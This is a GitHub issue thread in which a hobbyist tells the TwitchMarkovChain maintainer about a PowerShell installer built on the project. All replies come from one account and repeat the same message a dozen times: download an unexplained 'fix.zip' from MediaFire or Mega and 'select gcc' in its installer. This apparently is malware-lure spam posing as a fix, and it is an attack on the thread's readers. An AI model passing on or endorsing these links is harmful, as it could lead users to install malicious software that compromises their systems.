### ISSUE TITLE
created a streamlined installer for TwitchMarkovChain & python with powershell

### ISSUE THREAD

**Issue by fosterbarnes** [tomaarsen/TwitchMarkovChain#39]
Not an issue per se, but just reaching out.

I wrote a powershell script (along with some helper scripts) to "install" TwitchMarkovChain & python, as well passing user input (OAuth, account name, bot name etc.) to settings.json during setup.

I don't claim to be a good programmer, I'm just a hobbyist, but I had multiple friends have trouble getting TwitchMarkovChain to work on their own, so I streamlined the process.

Basically I just want you to be aware that I have been been using your project as part of mine, and I want make sure there are no issues there lol.

Info on "Twitch Yap Bot Installer": [https://sites.google.com/view/twitchyapbot/home](https://sites.google.com/view/twitchyapbot/home)

Cheers! Thanks for making TwitchMarkovChain, my chat and friends love it.

**Comment by darkstorm4hack** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."
